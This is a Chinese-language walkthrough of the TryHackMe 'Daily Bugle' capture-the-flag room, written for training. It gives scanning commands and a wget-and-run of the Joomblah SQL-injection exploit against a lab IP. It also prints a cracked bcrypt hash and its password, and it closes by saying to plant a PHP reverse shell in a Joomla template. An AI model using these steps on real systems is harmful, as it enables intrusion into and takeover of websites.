【THM】Daily Bugle-练习

本文相关的TryHackMe实验房间链接：https://tryhackme.com/room/dailybugle

通过学习相关知识点：通过SQLi渗透Joomla CMS的用户帐户，进行哈希破解并利用yum完成提权操作。

部署目标机

部署机器（重新部署靶机将导致目标ip发生变化），访问目标站点。

使用nmap进行端口扫描

nmap -Pn -sC -sV 10.10.74.183

由扫描结果得知：目标站点使用的CMS应该是Joomla CMS，并且还开启了mysql服务。

使用gobuster进行目录扫描

gobuster dir -u http://10.10.74.183/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --no-error

查看网站robots文件

访问网站的管理页面（ http://10.10.74.183/administrator/ ），成功进入到网站管理系统的登录页面。

使用joomscan针对目标站点进行扫描，joomscan是一个专门用于扫描Joomla CMS的工具。

joomscan -u http://10.10.74.183 #此处ip为目标ip
#也可以通过浏览器在线快速获取Joomla CMS的版本信息：直接访问10.10.74.183/language/en-GB/en-GB.xml即可。

可知目标所使用的Joomla CMS版本为：Joomla 3.7.0

在漏洞库中搜索该CMS 版本，发现存在SQL注入漏洞，此漏洞详情可以参考：https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html

在此我们不使用exploit-db所提供的exp，转而使用另外一个Python形式的exp方案：https://github.com/XiphosResearch/exploits/tree/master/Joomblah

wget https://raw.githubusercontent.com/XiphosResearch/exploits/master/Joomblah/joomblah.py
sudo python2 joomblah.py http://10.10.74.183
#此处ip为目标ip

成功获取到用户名和密码信息：jonah、$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm

查询上述hash值的加密方式（ https://hashcat.net/wiki/doku.php?id=example_hashes ）并使用john工具进行hash破解（需要提前将hash值保存为txt文件）

john --wordlist=/usr/share/wordlists/rockyou.txt jonahhash.txt --format=bcrypt

破解得到的hash密码明文为：spiderman123

jonah：spiderman123登录目标站点的CMS管理后台（ http://target_ip/administrator/ ），进入templates即模板界面，找到模板beez3并在index.php中写入反向shell脚本内容，参考以下链接（记得修改ip和端口）：https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php